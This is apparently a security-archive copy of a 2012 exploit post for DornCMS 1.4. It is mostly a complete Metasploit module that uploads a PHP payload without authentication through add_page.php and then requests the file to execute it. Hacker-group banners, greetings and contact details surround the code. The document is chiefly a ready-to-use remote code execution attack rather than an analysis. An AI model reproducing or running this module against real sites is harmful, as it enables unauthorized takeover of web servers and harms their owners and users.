DornCMS 1.4 (add_page.php) Arbitrary File Upload

🗓️ 25 May 2012 00:00:00Reported by KedAns-DzType
packetstorm🔗 packetstormsecurity.com👁 30 Views
DornCMS 1.4 (add_page.php) Arbitrary File Upload Vulnerability exploit allows unauthorized file uploa
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : DornCMS 1.4 (add_page.php) Arbitrary File Upload Vulnerability  
# Author : KedAns-Dz  
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com | www.inj3ct0rs.com  
# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d  
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com  
# platform : php  
# Type : Multiple  
# Security Risk : Critical  
# Tested on : Windows XP-SP3 (Fr)  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |  
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** |  
# | ------------------------------------------------- < |  
##  
  
./<3 <3 Greetings t0 Palestine <3 <3  
  
# Download : [http://garr.dl.sourceforge.net/project/dorncms/dorncms_1.4.zip]  
  
######## (!) Exploit ====>  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "DornCMS 1.4 (add_page.php) Arbitrary File Upload Vulnerability",  
'Description' => %q{  
This module exploits a vulnerability found in Dorn Content Management  
Script (CMS), version 1.4. By abusing the add_page.php file,the Attacker  
can upload/add a new file (.php) to the /cms/pages/ directory without any  
authentication, which results in arbitrary code execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'KedAns-Dz <ked-h[at]1337day.com>', #Discovery PoC and Metasploit  
],  
'References' =>  
[  
['URL', 'this p0c is 0-day'], # New 0day  
],  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "none"  
},  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['DornCMS 1.4', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Mai 25 2012",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to dorncms', '/dorncms_1.4'])  
], self.class)  
end  
  
def check  
uri = target_uri.path  
uri << '/' if uri[-1,1] != '/'  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => "#{uri}site/cms/add_page.php"  
})  
  
if res and res.code == 200 and res.body.empty?  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
uri = target_uri.path  
uri << '/' if uri[-1,1] != '/'  
  
peer = "#{rhost}:#{rport}"  
payload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php'  
  
post_data = "--1337day\r\n"  
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"  
post_data << "Content-Type : text/html;\r\n"  
post_data << "<?php "  
post_data << payload.encoded  
post_data << " ?>\r\n"  
post_data << "--1337day\r\n"  
  
print_status("#{peer} - Sending PHP payload (#{payload_name})")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => "#{uri}site/cms/add_page.php",  
'ctype' => 'multipart/form-data; boundary=1337day',  
'data' => post_data  
})  
  
if not res or res.code != 200 or res.body !~ /#{payload_name}/  
print_error("#{peer} - I don't think the file was uploaded !")  
return  
end  
  
print_status("#{peer} - Executing PHP payload (#{payload_name})")  
# Execute our payload  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => "#{uri}site/cms/pages/#{payload_name}"  
})  
  
if res and res.code != 200  
print_status("#{peer} - Server returns #{res.code.to_s}")  
end  
end  
  
############# << ThE|End  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w  
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)  
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection  
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * YMCMB !  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke  
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE  
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs ..  
#===========================================================================================================  
`
25 May 2012 00:00Current
7.4High risk
Vulners AI Score7.4